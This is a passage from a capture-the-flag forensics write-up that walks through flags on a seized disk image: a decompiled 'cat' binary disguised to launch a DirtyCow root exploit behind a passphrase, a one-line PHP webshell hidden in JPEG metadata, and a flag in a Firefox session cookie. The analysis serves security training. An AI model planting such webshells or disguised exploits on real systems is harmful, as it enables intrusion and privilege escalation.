class=\"w\" style=\"background: #263238;color: #EFF\">     <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">FUN_00101591<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">();<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">}<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">else<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">{<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">     <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">local_68<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mh\" style=\"background: #263238;color: #F78C6C\">0x20746163<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">     <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">local_64<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">     <\/span><span class=\"c1\" style=\"background: #263238;color: #546E7A;font-style: italic\">\/\/ prepare to call cat<\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">     <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">strcat<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">((<\/span><span class=\"kt\" style=\"background: #263238;color: #BB80B3\">char<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">*<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&amp;<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">local_68<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">*<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"kt\" style=\"background: #263238;color: #BB80B3\">char<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">**<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">param_2<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">+<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">8<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">));<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">     <\/span><span class=\"c1\" style=\"background: #263238;color: #546E7A;font-style: italic\">\/\/ call cat      <\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">     <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">system<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">((<\/span><span class=\"kt\" style=\"background: #263238;color: #BB80B3\">char<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">*<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&amp;<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">local_68<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">);<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">    <\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">}<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"cm\" style=\"background: #263238;color: #546E7A;font-style: italic\">\/* WARNING: Subroutine does not return *\/<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">exit<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">);<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"p\" style=\"background: #263238;color: #89DDFF\">}<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<\/pre><\/div>\n\n\n\n<div class=\"codehilite\" style=\"background: #263238;color: #EFF\"><pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">undefined8<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"nf\" style=\"background: #263238;color: #82AAFF\">FUN_00101591<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"kt\" style=\"background: #263238;color: #BB80B3\">void<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n\n<span class=\"p\" style=\"background: #263238;color: #89DDFF\">{<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">  <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">undefined<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">*<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">puVar1<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">  <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">ulong<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">uVar2<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">  <\/span><span class=\"kt\" style=\"background: #263238;color: #BB80B3\">long<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">in_FS_OFFSET<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">  <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">undefined8<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">uStack96<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">  <\/span><span class=\"kt\" style=\"background: #263238;color: #BB80B3\">char<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">*<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">local_58<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">  <\/span><span class=\"kt\" style=\"background: #263238;color: #BB80B3\">long<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">local_50<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">  <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">undefined<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">*<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">local_48<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">  <\/span><span class=\"kt\" style=\"background: #263238;color: #BB80B3\">long<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">local_40<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n\n<span class=\"w\" style=\"background: #263238;color: #EFF\">  <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">local_40<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">*<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"kt\" style=\"background: #263238;color: #BB80B3\">long<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">*<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">in_FS_OFFSET<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">+<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mh\" style=\"background: #263238;color: #F78C6C\">0x28<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">);<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">  <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">uStack96<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mh\" style=\"background: #263238;color: #F78C6C\">0x1015c6<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">  <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">puts<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"s\" style=\"background: #263238;color: #C3E88D\">\"DirtyCow root privilege escalation\"<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">);<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<\/pre><\/div>\n\n\n\n<p><strong>.\/cat <\/strong> will run <a href=\"https:\/\/dirtycow.ninja\/\" target=\"_blank\" rel=\"noopener\">cowroot<\/a> which will provide the\nattacker with a root shell if the kernel of the machine it is running on is vulnerable. The exploit was renamed to the innocent looking\nprogram <strong>cat<\/strong> and will act like it unless the correct passphrase is provided. It performs a modified base64 encoding algorithm on the input\nand compares it to a hard coded string. If the encoded input matches the string the exploit is executed. The challenge is the reverse\nthe encoded string to clear text.<\/p>\n\n\n\n<p>We want to observe what is happening inside the relevant part of the if section. To do this, run the program inside an C debugger like <strong>gdb<\/strong>,\nand set the value <strong>iVar1<\/strong> which is checked inside the guard to true.<\/p>\n\n\n\n<div class=\"codehilite\" style=\"background: #263238;color: #EFF\"><pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"gp\" style=\"background: #263238;color: #FFCB6B\">[student@host ~]$ <\/span>gdb cat\n<span class=\"gp gp-VirtualEnv\" style=\"background: #263238;color: #FFCB6B\">(gdb)<\/span><span class=\"go\" style=\"background: #263238;color: #546E7A\">set disassembly-flavor intel<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">...<\/span>\n<span class=\"gp gp-VirtualEnv\" style=\"background: #263238;color: #FFCB6B\">(gdb)<\/span><span class=\"go\" style=\"background: #263238;color: #546E7A\">r inp<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">...<\/span>\n<span class=\"gp gp-VirtualEnv\" style=\"background: #263238;color: #FFCB6B\">(gdb)<\/span><span class=\"go\" style=\"background: #263238;color: #546E7A\">info file<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">...<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\"> Entry point: 0x5555555550d0<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">...<\/span>\n<span class=\"gp gp-VirtualEnv\" style=\"background: #263238;color: #FFCB6B\">(gdb)<\/span><span class=\"go\" style=\"background: #263238;color: #546E7A\">b *0x5555555550d0<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">...<\/span>\n<span class=\"gp gp-VirtualEnv\" style=\"background: #263238;color: #FFCB6B\">(gdb)<\/span><span class=\"go\" style=\"background: #263238;color: #546E7A\">layout asm<\/span>\n<span class=\"gp\" style=\"background: #263238;color: #FFCB6B\">#  <\/span>step with si and n throught the program <span class=\"k\" style=\"background: #263238;color: #BB80B3\">until<\/span> the relevant section <span class=\"o\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">if<\/span> clause<span class=\"o\" style=\"background: #263238;color: #89DDFF\">)<\/span> is reached.\n\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">\u2502    0x5555555557b7  mov    QWORD PTR [rbp-0x80],rax                                                                                                                         <\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">\u2502    0x5555555557bb  mov    rax,QWORD PTR [rbp-0x80]                                                                                                                         <\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">\u2502    0x5555555557bf  lea    rdx,[rip+0x842]   #0x555555556008                                                                                                          <\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">\u2502    0x5555555557c6  mov    rsi,rdx                                                                                                                                          <\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">\u2502    0x5555555557c9  mov    rdi,rax                                                                                                                                          <\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">\u2502    0x5555555557cc  call   0x555555555070 &lt;strcmp@plt&gt;  <\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">\u2502    0x5555555557d1  test   eax,eax     #  &lt;--- if (iVar1==0)                                                                                                               <\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">\u2502    0x5555555557d3  jne    0x555555555852                                                                                                                                   <\/span>\n<span class=\"gp gp-VirtualEnv\" style=\"background: #263238;color: #FFCB6B\">(gdb)<\/span><span class=\"go\" style=\"background: #263238;color: #546E7A\">b *0x5555555557d1<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">...<\/span>\n<span class=\"gp\" style=\"background: #263238;color: #FFCB6B\">#  <\/span>setting <span class=\"nv\" style=\"background: #263238;color: #89DDFF\">iVar1<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">==<\/span> <span class=\"m\" style=\"background: #263238;color: #F78C6C\">0<\/span> to <span class=\"nb\" style=\"background: #263238;color: #82AAFF\">true<\/span>\n<span class=\"gp gp-VirtualEnv\" style=\"background: #263238;color: #FFCB6B\">(gdb)<\/span><span class=\"go\" style=\"background: #263238;color: #546E7A\">set $eax=0<\/span>\n<span class=\"gp gp-VirtualEnv\" style=\"background: #263238;color: #FFCB6B\">(gdb)<\/span><span class=\"go\" style=\"background: #263238;color: #546E7A\">c<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">Continuing.<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">0wned by pwnic0rn<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">[Detaching after vfork from child process 37666]<\/span>\n<span class=\"gp\" style=\"background: #263238;color: #FFCB6B\">$  <\/span><span class=\"nb\" style=\"background: #263238;color: #82AAFF\">exit<\/span>\n<span class=\"gp\" style=\"background: #263238;color: #FFCB6B\">#  <\/span><span class=\"s2\" style=\"background: #263238;color: #C3E88D\">\"0wned by pwnic0rn\"<\/span> is not found <span class=\"k\" style=\"background: #263238;color: #BB80B3\">in<\/span> the binary, so local_80 is probably the encoded representation of <span class=\"s2\" style=\"background: #263238;color: #C3E88D\">\"0wned by pwnic0rn\"<\/span> and FUN_00101479 is a decoding <span class=\"k\" style=\"background: #263238;color: #BB80B3\">function<\/span>\n<span class=\"gp\" style=\"background: #263238;color: #FFCB6B\">#  <\/span><span class=\"nv\" style=\"background: #263238;color: #89DDFF\">iVar1<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span> strcmp<span class=\"o\" style=\"background: #263238;color: #89DDFF\">(<\/span>local_88,<span class=\"s2\" style=\"background: #263238;color: #C3E88D\">\"SDt+TLwfFUF8t9xUR+S9tIsOQUkJSjoHTVJ=\"<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">)<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;<\/span>  &lt;-- the encoded passphrase. If we pass this to the decoding <span class=\"k\" style=\"background: #263238;color: #BB80B3\">function<\/span> we should get the cleartext\n<span class=\"gp gp-VirtualEnv\" style=\"background: #263238;color: #FFCB6B\">(gdb)<\/span><span class=\"go\" style=\"background: #263238;color: #546E7A\">r inp<\/span>\n<span class=\"gp\" style=\"background: #263238;color: #FFCB6B\">#  <\/span>step with si and n <span class=\"k\" style=\"background: #263238;color: #BB80B3\">until<\/span> the adress of local_78 is loaded\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">\u2502    0x5555555557bb  mov    rax,QWORD PTR [rbp-0x80]                                                                                                                         <\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">\u2502    0x5555555557bf  lea    rdx,[rip+0x842]        #  0x555555556008  &lt;-- Location of \"SDt+TLwfFUF8t9xUR+S9tIsOQUkJSjoHTVJ=\"                                                  <\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">\u2502    0x5555555557c6  mov    rsi,rdx                                                                                                                                          <\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">\u2502    0x5555555557c9  mov    rdi,rax                                                                                                                                          <\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">\u2502    0x5555555557cc  call   0x555555555070 &lt;strcmp@plt&gt;  <\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">\u2502    0x5555555557d1  test   eax,eaxTR [rbp-0x78],rax                                                                                                                         <\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">\u2502    0x5555555557d3  jne    0x555555555852[rbp-0x78]                                                                                                                         <\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">\u2502    0x5555555557d5  lea    rax,[rip+0x851]        #  0x55555555602d  &lt;-- Location of local_80                                                                                <\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">\u2502  &gt;  0x5555555557dc  mov    QWORD PTR [rbp-0x78],raxlt&gt;,rcx                                                                                                                  <\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">\u2502    0x5555555557e0  mov    rax,QWORD PTR [rbp-0x78]                                                                                                                         <\/span>\n<span class=\"gp\" style=\"background: #263238;color: #FFCB6B\"># <\/span><span class=\"nb\" style=\"background: #263238;color: #82AAFF\">set<\/span> <span class=\"nv\" style=\"background: #263238;color: #89DDFF\">$rax<\/span> to the location of the encoded passphrase\n<span class=\"gp gp-VirtualEnv\" style=\"background: #263238;color: #FFCB6B\">(gdb)<\/span><span class=\"go\" style=\"background: #263238;color: #546E7A\">set $rax=0x555555556008<\/span>\n<span class=\"gp gp-VirtualEnv\" style=\"background: #263238;color: #FFCB6B\">(gdb)<\/span><span class=\"go\" style=\"background: #263238;color: #546E7A\">c<\/span>\n<span class=\"gp\" style=\"background: #263238;color: #FFCB6B\"># <\/span>now instead of decodeding the welcome message the passphrase will be decoded and printed \n<span class=\"go\" style=\"background: #263238;color: #546E7A\">...&lt;SNIP&gt;...<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">usd{d1ffb64frGc739na4t22z}<\/span>\n<\/pre><\/div>\n\n\n\n<p>Another way to decode the passphrase is to notice the base64-like structure of the strings, and to look for a dictionary that is used to perform the encoding:<\/p>\n\n\n\n<div class=\"codehilite\" style=\"background: #263238;color: #EFF\"><pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"gp\" style=\"background: #263238;color: #FFCB6B\">[student@host ~]$ <\/span>strings cat\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">...&lt;SNIP&gt;...<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">SDt+TLwfFUF8t9xUR+S9tIsOQUkJSjoHTVJ=<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">snScFCw6EV+6RnScGCseRUN=<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">...&lt;SNIP&gt;...<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">Ahijklmnopqrstuvwxyz0BCDEFGQRST56789+\/UVWXYZabcdefHIJKLMNOPg1234 #  &lt;-- dictionary<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">...&lt;SNIP&gt;...<\/span>\n<\/pre><\/div>\n\n\n\n<p>Once the dictionary is known tools like <a href=\"https:\/\/gchq.github.io\/CyberChef\/\" target=\"_blank\" rel=\"noopener\">https:\/\/gchq.github.io\/CyberChef\/<\/a>\nor <a href=\"https:\/\/cryptii.com\/pipes\/text-to-base64\" target=\"_blank\" rel=\"noopener\">https:\/\/cryptii.com\/pipes\/text-to-base64<\/a> can be used to decode the string.<\/p>\n\n\n\n<p><\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><a id=\"flag-5-php-webshell-in-image\"><\/a>Flag 5: PHP webshell in image<\/h4>\n\n\n\n<p>Inside the <strong>tools<\/strong> folder of <strong>jim<\/strong>, we find a local clone of the popular <a href=\"https:\/\/github.com\/swisskyrepo\/PayloadsAllTheThings\" target=\"_blank\" rel=\"noopener\">PayloadsAllTheThings<\/a>\nrepository: <strong>\/mnt\/home\/jim\/tools\/PayloadsAllTheThings<\/strong>. We should look for local changes:<\/p>\n\n\n\n<div class=\"codehilite\" style=\"background: #263238;color: #EFF\"><pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"gp\" style=\"background: #263238;color: #FFCB6B\">[student@host ~]$ <\/span><span class=\"nb\" style=\"background: #263238;color: #82AAFF\">cd<\/span> \/mnt\/home\/jim\/tools\/PayloadsAllTheThings\n<span class=\"gp\" style=\"background: #263238;color: #FFCB6B\">[student@host \/mnt\/home\/jim\/tools\/PayloadsAllTheThings]$ <\/span>git ls-files . --exclude-standard --others\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">Upload Insecure Files\/Picture Metadata\/pwncat.jpg<\/span>\n<span class=\"gp\" style=\"background: #263238;color: #FFCB6B\">[student@host \/mnt\/home\/jim\/tools\/PayloadsAllTheThings]$ <\/span>exiftool <span class=\"s1\" style=\"background: #263238;color: #C3E88D\">'Upload Insecure Files\/Picture Metadata\/pwncat.jpg'<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">...&lt;SNIP&gt;...<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">Certificate                     : &lt;?php system($_GET[\"cmd\"]);   echo(bzk{53ll7m14093k2343197j});?&gt;<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">...&lt;SNIP&gt;...<\/span>\n<\/pre><\/div>\n\n\n\n<p>This is obviously a webshell which executes the command specified within the <em>GET parameter<\/em> <strong>cmd<\/strong> when evaluated\nby a <em>PHP<\/em> server. <strong>bzk{53ll7m14093k2343197j}<\/strong>, on the other hand, looks like an encoded Flag. Since <strong>{}<\/strong> was not\nencoded, a shifting cipher was probably used. We can now brute-force all possible shifts:<\/p>\n\n\n\n<div class=\"codehilite\" style=\"background: #263238;color: #EFF\"><pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"gp\" style=\"background: #263238;color: #FFCB6B\">[student@host ~]$ <\/span><span class=\"nb\" style=\"background: #263238;color: #82AAFF\">echo<\/span> bzk<span class=\"o\" style=\"background: #263238;color: #89DDFF\">{<\/span>53ll7m14093k2343197j<span class=\"o\" style=\"background: #263238;color: #89DDFF\">}<\/span> <span class=\"p\" style=\"background: #263238;color: #89DDFF\">|<\/span> tr <span class=\"s1\" style=\"background: #263238;color: #C3E88D\">'A-Za-z'<\/span> <span class=\"s1\" style=\"background: #263238;color: #C3E88D\">'T-ZA-St-za-s'<\/span> <span class=\"c1\" style=\"background: #263238;color: #546E7A;font-style: italic\">#shift by 19<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">usd{53ee7f14093d2343197c}<\/span>\n<\/pre><\/div>\n\n\n\n<p>An alternative would be to use tools like <a href=\"https:\/\/www.dcode.fr\/caesar-cipher\" target=\"_blank\" rel=\"noopener\">dcode.fr<\/a> which can guess the shift for us.<\/p>\n\n\n\n<p><\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><a id=\"flag-6-firefox-cookies\"><\/a>Flag 6: Firefox cookies<\/h4>\n\n\n\n<p>Within the backup, we also find a <strong>~\/.mozilla<\/strong> folder. This suggests that firefox was used on the foreign machine, and we may\nbe able to obtain useful information from stored cookies. We find that the <strong>cookies.sqlite<\/strong> cookie storage of firefox contains\na base64 encoded flag:<\/p>\n\n\n\n<div class=\"codehilite\" style=\"background: #263238;color: #EFF\"><pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"gp\" style=\"background: #263238;color: #FFCB6B\">[student@host ~]$ <\/span><span class=\"nb\" style=\"background: #263238;color: #82AAFF\">cd<\/span> \/mnt\/home\/jim\/.mozilla\/firefox\/xsds7s5w.default-release\n<span class=\"gp\" style=\"background: #263238;color: #FFCB6B\">[student@host \/mnt\/home\/jim\/.mozilla\/firefox\/xsds7s5w.default-release]$ <\/span>sqlite3 cookies.sqlite\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">sqlite&gt;  select * from moz_cookies;<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">...<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">9||SHOPPING_CART|{ 'items':[{'id': '123', 'size': 'XL', 'color':'black'}, {'id':345, 'size'='54', 'color'='grey'}]}|www.aclothingstore.com|\/|1642584319|1642497930588553|1642497930588553|0|0|0|0|0|0<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">10||SESSION|dXNkezUwY2YxOTkxMjk2MGY2NTQ5MGIzfQo=|www.aclothingstore.com|\/|1642584319|1642497930588553|1642497930588553|0|0|0|0|0|0<\/span>\n<\/pre><\/div>\n\n\n\n<p>The <strong>SESSION<\/strong> cookie from <em>aclothingstore.com<\/em> contains a base 64 encoded string:<\/p>\n\n\n\n<div class=\"codehilite\" style=\"background: #263238;color: #EFF\"><pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"gp\" style=\"background: #263238;color: #FFCB6B\">$ <\/span><span class=\"nb\" style=\"background: #263238;color: #82AAFF\">echo<\/span> <span class=\"s2\" style=\"background: #263238;color: #C3E88D\">\"dXNkezUwY2YxOTkxMjk2MGY2NTQ5MGIzfQo=\"<\/span> <span class=\"p\" style=\"background: #263238;color: #89DDFF\">|<\/span> base64 -d\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">usd{50cf19912960f65490b3}<\/span>\n<\/pre><\/div>\n\n\n\n<p><\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><a id=\"flag-7-deleted-email\"><\/a>Flag 7: Deleted Email<\/h4>\n\n\n\n<p>So far we looked at files that were still present within the image. One crucial step in analyzing disk images is looking for deleted\nfiles. This can be done with tools like <strong>photorec<\/strong>:<\/p>\n\n\n\n<div class=\"codehilite\" style=\"background: #263238;color: #EFF\"><pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"gp\" style=\"background: #263238;color: #FFCB6B\">[student@host ~]$ <\/span>photorec image.img\n<span class=\"gp\" style=\"background: #263238;color: #FFCB6B\"># <\/span>it is important to <span class=\"k\" style=\"background: #263238;color: #BB80B3\">select<\/span> the ext4 fs\n<span class=\"gp\" style=\"background: #263238;color: #FFCB6B\"># <\/span>the <span class=\"k\" style=\"background: #263238;color: #BB80B3\">select<\/span> <span class=\"s2\" style=\"background: #263238;color: #C3E88D\">\"free space\"<\/span>, otherwise photorec will attempt to restore all files on the fs\n<span class=\"go\" style=\"background: #263238;color: 